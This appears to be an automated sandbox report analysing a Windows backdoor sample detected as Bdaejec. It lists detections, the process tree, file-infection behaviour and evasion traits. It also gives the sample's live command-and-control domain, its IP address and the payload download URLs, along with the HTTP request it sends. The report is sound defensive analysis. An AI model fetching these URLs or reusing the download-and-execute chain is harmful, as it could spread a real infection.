Edit tour

Windows Analysis Report
yRc7UfFif9.exe

Overview

General Information

Sample name:	yRc7UfFif9.exe renamed because original name is a hash value
Original sample name:	2024-12-28_7acf6527ef4bef7f7325a94c4d92c1f9.exe
Analysis ID:	1581653
MD5:	7acf6527ef4bef7f7325a94c4d92c1f9
SHA1:	8c39212f127dfe4c04b05f05b9e6759566ed207a
SHA256:	69e834be4264dab45e393e63952ae3b65f4e027a5928509c013b16175a43504b
Tags:	backdoorexeuser-zhuzhu0009
Infos:

Detection

Bdaejec

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Bdaejec

AI detected suspicious sample

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain (may stop execution after checking a module file name)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

System is w10x64

yRc7UfFif9.exe (PID: 6580 cmdline: "C:\Users\user\Desktop\yRc7UfFif9.exe" MD5: 7ACF6527EF4BEF7F7325A94C4D92C1F9)

sgKbPm.exe (PID: 7164 cmdline: C:\Users\user\AppData\Local\Temp\sgKbPm.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)

WerFault.exe (PID: 6848 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7164 -s 1468 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: sgKbPm.exe PID: 7164	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security

Suricata Signatures

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T12:24:59.104038+0100	2807908	1	Malware Command and Control Activity Detected	192.168.2.5	49704	44.221.84.105	799	TCP

ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T12:24:57.491932+0100	2838522	1	Malware Command and Control Activity Detected	192.168.2.5	55185	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: yRc7UfFif9.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net:799/cj//k2.rar_	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar9	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarp	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarB	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarB	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net/	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarH	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarI	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarn	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe

ReversingLabs: Detection: 97%

Multi AV Scanner detection for submitted file

Source: yRc7UfFif9.exe	ReversingLabs: Detection: 97%
Source: yRc7UfFif9.exe	Virustotal: Detection: 87%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: yRc7UfFif9.exe

Joe Sandbox ML: detected

Source: yRc7UfFif9.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe

Code function: 1_2_00C529E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

1_2_00C529E2

Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe

Code function: 1_2_00C52B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_00C52B8C

Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2838522 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup : 192.168.2.5:55185 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.5:49704 -> 44.221.84.105:799

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49704 -> 799

Source: global traffic

TCP traffic: 192.168.2.5:49704 -> 44.221.84.105:799

Source: Joe Sandbox View

IP Address: 44.221.84.105 44.221.84.105

Source: global traffic

HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe

Code function: 1_2_00C51099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,

1_2_00C51099

Source: global traffic

DNS traffic detected: DNS query: ddos.dnsnb8.net

Source: sgKbPm.exe, 00000001.00000003.2022814417.0000000000C40000.00000004.00001000.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: sgKbPm.exe, 00000001.00000003.2045756473.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/
Source: sgKbPm.exe, 00000001.00000003.2045756473.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: sgKbPm.exe, 00000001.00000003.2045756473.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar9
Source: sgKbPm.exe, 00000001.00000003.2045756473.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarB
Source: sgKbPm.exe, 00000001.00000003.2045756473.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarn
Source: sgKbPm.exe, 00000001.00000002.2433578277.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433918808.00000000029EA000.00000004.00000010.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: sgKbPm.exe, 00000001.00000002.2433578277.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarB
Source: sgKbPm.exe, 00000001.00000002.2433578277.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarH
Source: sgKbPm.exe, 00000001.00000002.2433918808.00000000029EA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarI
Source: sgKbPm.exe, 00000001.00000002.2433578277.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar_
Source: sgKbPm.exe, 00000001.00000002.2433578277.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433918808.00000000029EA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarp
Source: Amcache.hve.1.dr	String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: sgKbPm.exe, 00000001.00000003.2045756473.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Source: SciTE.exe.1.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_e80d517b-f

System Summary

PE file contains section with special chars

Source: MyProg.exe.1.dr

Static PE information: section name: Y|uR

PE file has a writeable .text section

Source: sgKbPm.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\yRc7UfFif9.exe	Code function: 0_2_00417B71	0_2_00417B71
Source: C:\Users\user\Desktop\yRc7UfFif9.exe	Code function: 0_2_00407320	0_2_00407320
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Code function: 1_2_00C56076	1_2_00C56076
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Code function: 1_2_00C56D00	1_2_00C56D00

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\sgKbPm.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07

Source: C:\Users\user\Desktop\yRc7UfFif9.exe

Code function: String function: 0040379C appears 32 times

Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7164 -s 1468

Source: MyProg.exe.1.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: yRc7UfFif9.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: sgKbPm.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: sgKbPm.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: sgKbPm.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: classification engine

Classification label: mal100.spre.troj.evad.winEXE@5/11@1/1

Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe

Code function: 1_2_00C5119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,

1_2_00C5119F

Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k1[1].rar

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7164

Source: C:\Users\user\Desktop\yRc7UfFif9.exe

File created: C:\Users\user\AppData\Local\Temp\sgKbPm.exe

Jump to behavior

Source: C:\Users\user\Desktop\yRc7UfFif9.exe

Command line argument: Z@

0_2_00405A30

Source: C:\Users\user\Desktop\yRc7UfFif9.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: yRc7UfFif9.exe	ReversingLabs: Detection: 97%
Source: yRc7UfFif9.exe	Virustotal: Detection: 87%

Source: unknown	Process created: C:\Users\user\Desktop\yRc7UfFif9.exe "C:\Users\user\Desktop\yRc7UfFif9.exe"
Source: C:\Users\user\Desktop\yRc7UfFif9.exe	Process created: C:\Users\user\AppData\Local\Temp\sgKbPm.exe C:\Users\user\AppData\Local\Temp\sgKbPm.exe
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7164 -s 1468
Source: C:\Users\user\Desktop\yRc7UfFif9.exe	Process created: C:\Users\user\AppData\Local\Temp\sgKbPm.exe C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Jump to behavior

Source: C:\Users\user\Desktop\yRc7UfFif9.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe

Unpacked PE file: 1.2.sgKbPm.exe.c50000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Source: C:\Users\user\Desktop\yRc7UfFif9.exe

Code function: 0_2_00409607 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

0_2_00409607

Source: initial sample

Static PE information: section where entry point is pointing to: wu

Source: yRc7UfFif9.exe	Static PE information: section name: wu
Source: sgKbPm.exe.0.dr	Static PE information: section name: .aspack
Source: sgKbPm.exe.0.dr	Static PE information: section name: .adata
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.1.dr	Static PE information: section name: PELIB
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR
Source: SciTE.exe.1.dr	Static PE information: section name: u

Source: C:\Users\user\Desktop\yRc7UfFif9.exe	Code function: 0_2_00416E7B push ebp; ret	0_2_00416E7E
Source: C:\Users\user\Desktop\yRc7UfFif9.exe	Code function: 0_2_00416E85 push 00000000h; ret	0_2_00417296
Source: C:\Users\user\Desktop\yRc7UfFif9.exe	Code function: 0_2_004037E1 push ecx; ret	0_2_004037F4
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Code function: 1_2_00C56076 push 00C514E1h; ret	1_2_00C56425
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Code function: 1_2_00C51638 push dword ptr [00C53084h]; ret	1_2_00C5170E
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Code function: 1_2_00C5600A push ebp; ret	1_2_00C5600D
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Code function: 1_2_00C52D9B push ecx; ret	1_2_00C52DAB

Source: yRc7UfFif9.exe	Static PE information: section name: wu entropy: 6.934516547069036
Source: sgKbPm.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ entropy: 6.934478529640631
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR entropy: 6.934470497867294
Source: SciTE.exe.1.dr	Static PE information: section name: u entropy: 6.934409931315566

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\yRc7UfFif9.exe	File created: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49704 -> 799

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
